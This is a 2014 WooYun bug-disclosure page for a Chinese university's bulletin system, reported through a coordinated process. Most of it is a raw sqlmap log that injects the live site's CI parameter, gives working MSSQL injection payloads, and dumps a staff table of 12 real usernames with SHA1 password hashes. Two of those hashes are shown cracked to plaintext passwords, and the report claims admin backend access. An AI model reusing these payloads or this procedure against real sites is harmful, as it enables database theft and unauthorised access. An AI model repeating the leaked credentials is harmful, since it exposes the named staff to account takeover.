当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066801

漏洞标题:南京信息工程大学信息公告存在sql注射,暴库后可进入后台

相关厂商:南京信息工程大学

漏洞作者: 小周周

提交时间:2014-07-01 10:55

修复时间:2014-08-15 10:56

公开时间:2014-08-15 10:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-01: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-15: 细节向公众公开

简要描述:

南京信息工程大学信息公告存在sql注射,暴库后可进入后台

详细说明:

南京信息工程大学信息公告存在sql注射,暴库后可进入后台。注入参数为CI。

漏洞证明:

sqlmap暴库:
D:\Python27\sqlmap>sqlmap.py -u http://www.nuist.edu.cn/bulletin/(S(vg1zht2ldpfv
fmiqket04h55))/Default.aspx?CI=0
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 00:41:43
[00:39:31] [INFO] resuming back-end DBMS 'microsoft sql server'
[00:39:31] [INFO] testing connection to the target URL
[00:39:31] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: CI
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: CI=-7292 OR 5615=CONVERT(INT,(SELECT CHAR(113)+CHAR(105)+CHAR(120)+
CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (5615=5615) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(122)+CHAR(117)+CHAR(108)+CHAR(113)))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: CI=-8325 OR 7403=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS
sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysuse
rs AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: CI=(SELECT CHAR(113)+CHAR(105)+CHAR(120)+CHAR(111)+CHAR(113)+(SELEC
T (CASE WHEN (5293=5293) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+C
HAR(117)+CHAR(108)+CHAR(113))
---
[00:39:31] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[00:39:31] [INFO] fetching columns 'Password, UserName' for table 'Teachers' in
database 'bulletin'
[00:39:32] [WARNING] the SQL query provided does not return any output
[00:39:32] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[00:39:32] [INFO] resumed: UserName
[00:39:32] [INFO] resumed: Password
[00:39:32] [INFO] resumed: RealName
[00:39:32] [INFO] resumed: Purview
[00:39:32] [INFO] resumed: Telephone
[00:39:32] [INFO] resumed: Department
[00:39:32] [INFO] resumed: Email
[00:39:32] [INFO] resumed: RegTime
[00:39:32] [INFO] resumed: RegIP
[00:39:32] [INFO] resumed: LoginTimes
[00:39:32] [INFO] resumed: LastLogin
[00:39:32] [INFO] resumed: LoginError
[00:39:32] [INFO] resumed: LoginErrorTime
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] fetching entries of column(s) 'Department, Email, LastLogin, L
oginError, LoginErrorTime, LoginTimes, Password, Purview, RealName, RegIP, RegTi
me, Telephone, UserName' for table 'Teachers' in database 'bulletin'
[00:39:32] [INFO] resumed: 12
[00:39:32] [INFO] fetching number of distinct values for column 'Email'
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] fetching number of distinct values for column 'RegIP'
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] fetching number of distinct values for column 'Purview'
[00:39:32] [INFO] resumed: 2
[00:39:32] [INFO] fetching number of distinct values for column 'RegTime'
[00:39:32] [INFO] resumed: 3
[00:39:32] [INFO] fetching number of distinct values for column 'Password'
[00:39:32] [INFO] resumed: 12
[00:39:32] [INFO] using column 'Password' as a pivot for retrieving row data
[00:39:32] [INFO] resumed: 0884D7F166FD81B805ADCDBE021CA70147854740
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[00:39:32] [INFO] resumed: ?? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: chenli \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 19 2014 10:10AM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 2
[00:39:32] [INFO] resumed: 1468
[00:39:32] [INFO] resumed: 06 \\\\?a09 2014 \\\\?a02:18PM
[00:39:32] [INFO] resumed: 2500D47B008972051C40D159D8B5E24368EAA87F
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ??? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: lijingjing
[00:39:32] [INFO] resumed: 06 26 2014 \\\\?a02:10PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 1000
[00:39:32] [INFO] resumed: 04 \\\\?a01 2014 \\\\?a02:14PM
[00:39:32] [INFO] resumed: 30D2576586A10FD594331E9B04D88AB6C17D4B40
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ?? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: lixiang \\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 13 2014 \\\\?a02:18PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 413
[00:39:32] [INFO] resumed: 04 30 2014 \\\\?a02:51PM
[00:39:32] [INFO] resumed: 3D8739CE3F0835BF092CCF00FAA6671284C8AF7D
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ??? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: zhouyh \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 29 2014 \\\\?a02:15PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 486
[00:39:32] [INFO] resumed: 05 \\\\?a08 2014 \\\\?a01:52PM
[00:39:32] [INFO] resumed: 63BE684AAF1F018A2417A8EFE31A1B16BD3DE70F
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed: 01 \\\\?a07 2009 \\\\?a09:51AM
[00:39:32] [INFO] resumed: ?? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: zhangf \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 26 2014 \\\\?a02:55PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 5
[00:39:32] [INFO] resumed: 878
[00:39:32] [INFO] resumed: 05 \\\\?a05 2014 \\\\?a01:22PM
[00:39:32] [INFO] resumed: 682132C8A4D6D40EF9915BA0B2C20EBF21D83CB0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed: 09 26 2007 \\\\?a03:29PM
[00:39:32] [INFO] resumed: ??? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: xuyy \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 09 22 2013 \\\\?a03:02PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 2
[00:39:32] [INFO] resumed: 923
[00:39:32] [INFO] resumed: 05 \\\\?a08 2013 \\\\?a03:09PM
[00:39:32] [INFO] resumed: 753A28F1DA3EBCE97C7A672BAE0E09977A1DBACE
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: superadmin
[00:39:32] [INFO] resumed: 09 \\\\?a01 2007 \\\\?a01:22PM
[00:39:32] [INFO] resumed: ??? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: booyee \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 30 2014 \\\\?a03:48PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 1815
[00:39:32] [INFO] resumed: 06 22 2014 \\\\?a03:08PM
[00:39:32] [INFO] resumed: 81F7280A8B8AA9D9A099CF88CC6D0D0B0477B58D
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ??? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: xiaots \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 26 2014 12:55PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 558
[00:39:32] [INFO] resumed: 12 26 2013 \\\\?a01:43PM
[00:39:32] [INFO] resumed: A1DC484F1E6D3903616F7EE6738A3202F8AFAD1B
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ???? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: center \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 11 \\\\?a06 2009 \\\\?a09:12PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 412
[00:39:32] [INFO] resumed: 06 13 2013 11:45AM
[00:39:32] [INFO] resumed: B08F55426540019ED39DF6C1E76CBBE28F878F70
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ?? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: hujing \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 30 2014 \\\\?a01:49PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 264
[00:39:32] [INFO] resumed: 12 27 2013 11:04AM
[00:39:32] [INFO] resumed: DC9F30C55C0E8D6A908874366CA495EA613CC3D7
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ???? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: wangluozx
[00:39:32] [INFO] resumed: 06 30 2014 11:26AM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 973
[00:39:32] [INFO] resumed: 02 24 2014 \\\\?a09:27AM
[00:39:32] [INFO] resumed: DEECA1DE223C76F6E149882330F4332FD2B7A351
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: admin
[00:39:32] [INFO] resumed:
[00:39:32] [INFO] resumed: ??? \\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: zhaoqh \\\\?a0\\\\?a0\\\\?a0
[00:39:32] [INFO] resumed: 06 22 2014 \\\\?a03:01PM
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 0
[00:39:32] [INFO] resumed: 1
[00:39:32] [INFO] resumed: 1011
[00:39:32] [INFO] resumed: 10 \\\\?a07 2013 12:58PM
[00:39:32] [INFO] analyzing table dump for possible password hashes
[00:39:32] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[00:39:35] [INFO] using hash method 'sha1_generic_passwd'
[00:39:35] [INFO] resuming password '521983' for hash 'b08f55426540019ed39df6c1e
76cbbe28f878f70' for user 'hujing \\?a0\\?a0\\?a0'
[00:39:35] [INFO] resuming password 'azsxdcfvgbhn' for hash 'deeca1de223c76f6e14
9882330f4332fd2b7a351' for user 'zhaoqh \\?a0\\?a0\\?a0'
what dictionary do you want to use?
[1] default dictionary file 'D:\Python27\sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[00:39:35] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[00:39:36] [INFO] starting dictionary-based cracking (sha1_generic_passwd)
[00:39:36] [INFO] starting 4 processes
[00:39:57] [INFO] postprocessing table dump
Database: bulletin
Table: Teachers
[12 entries]
+-------+-------+------------+----------------------------+---------------------
-----------+---------------------------------------------------------+----------
------------------------------+-----------+----------------------------+--------
----+------------+------------+----------------------------+
| RegIP | Email | Purview | RegTime | UserName
| Password | RealName
| Telephone | LastLogin | LoginTi
mes | LoginError | Department | LoginErrorTime |
+-------+-------+------------+----------------------------+---------------------
-----------+---------------------------------------------------------+----------
------------------------------+-----------+----------------------------+--------
----+------------+------------+----------------------------+
| 0 | 0 | admin | NULL | chenli \\?a0\\?a0\\?
a0 | 0884D7F166FD81B805ADCDBE021CA70147854740 | ?? \\?a0\
\?a0\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 19 2014 10:10AM | 1468
| 2 | 0 | 06 \\?a09 2014 \\?a02:18PM |
| 0 | 0 | admin | NULL | lijingjing
| 2500D47B008972051C40D159D8B5E24368EAA87F | ??? \\?a0
\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 26 2014 \\?a02:10PM | 1000
| 1 | 0 | 04 \\?a01 2014 \\?a02:14PM |
| 0 | 0 | admin | NULL | lixiang \\?a0\\?a0
| 30D2576586A10FD594331E9B04D88AB6C17D4B40 | ?? \\?a0\
\?a0\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 13 2014 \\?a02:18PM | 413
| 1 | 0 | 04 30 2014 \\?a02:51PM |
| 0 | 0 | admin | NULL | zhouyh \\?a0\\?a0\\?
a0 | 3D8739CE3F0835BF092CCF00FAA6671284C8AF7D | ??? \\?a0
\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 29 2014 \\?a02:15PM | 486
| 1 | 0 | 05 \\?a08 2014 \\?a01:52PM |
| 0 | 0 | admin | 01 \\?a07 2009 \\?a09:51AM | zhangf \\?a0\\?a0\\?
a0 | 63BE684AAF1F018A2417A8EFE31A1B16BD3DE70F | ?? \\?a0\
\?a0\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 26 2014 \\?a02:55PM | 878
| 5 | 0 | 05 \\?a05 2014 \\?a01:22PM |
| 0 | 0 | admin | 09 26 2007 \\?a03:29PM | xuyy \\?a0\\?a0\\?a0
\\?a0\\?a0 | 682132C8A4D6D40EF9915BA0B2C20EBF21D83CB0 | ??? \\?a0
\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 09 22 2013 \\?a03:02PM | 923
| 2 | 0 | 05 \\?a08 2013 \\?a03:09PM |
| 0 | 0 | superadmin | 09 \\?a01 2007 \\?a01:22PM | booyee \\?a0\\?a0\\?
a0 | 753A28F1DA3EBCE97C7A672BAE0E09977A1DBACE | ??? \\?a0
\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 30 2014 \\?a03:48PM | 1815
| 1 | 0 | 06 22 2014 \\?a03:08PM |
| 0 | 0 | admin | NULL | xiaots \\?a0\\?a0\\?
a0 | 81F7280A8B8AA9D9A099CF88CC6D0D0B0477B58D | ??? \\?a0
\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 26 2014 12:55PM | 558
| 1 | 0 | 12 26 2013 \\?a01:43PM |
| 0 | 0 | admin | NULL | center \\?a0\\?a0\\?
a0 | A1DC484F1E6D3903616F7EE6738A3202F8AFAD1B | ???? \\?a
0\\?a0\\?a0\\?a0\\?a0 | 0 | 11 \\?a06 2009 \\?a09:12PM | 412
| 1 | 0 | 06 13 2013 11:45AM |
| 0 | 0 | admin | NULL | hujing \\?a0\\?a0\\?
a0 | B08F55426540019ED39DF6C1E76CBBE28F878F70 (521983) | ?? \\?a0\
\?a0\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 30 2014 \\?a01:49PM | 264
| 1 | 0 | 12 27 2013 11:04AM |
| 0 | 0 | admin | NULL | wangluozx
| DC9F30C55C0E8D6A908874366CA495EA613CC3D7 | ???? \\?a
0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 30 2014 11:26AM | 973
| 1 | 0 | 02 24 2014 \\?a09:27AM |
| 0 | 0 | admin | NULL | zhaoqh \\?a0\\?a0\\?
a0 | DEECA1DE223C76F6E149882330F4332FD2B7A351 (azsxdcfvgbhn) | ??? \\?a0
\\?a0\\?a0\\?a0\\?a0\\?a0 | 0 | 06 22 2014 \\?a03:01PM | 1011
| 1 | 0 | 10 \\?a07 2013 12:58PM |
+-------+-------+------------+----------------------------+---------------------
-----------+---------------------------------------------------------+----------
------------------------------+-----------+----------------------------+--------
----+------------+------------+----------------------------+
[00:39:57] [INFO] table 'bulletin.dbo.Teachers' dumped to CSV file 'D:\Python27\
sqlmap\output\www.nuist.edu.cn\dump\bulletin\Teachers.csv'
[00:39:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[00:39:57] [INFO] fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.nuist.edu.cn'
[*] shutting down at 00:39:57
进入后台:

AUI9E469H]Z(VIQDCX)9UUE.jpg

修复方案:

你懂得

版权声明:转载请注明来源 小周周@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-07-04 16:21

厂商回复:

已通知相关学校处理

最新状态:

暂无


漏洞评价:

评论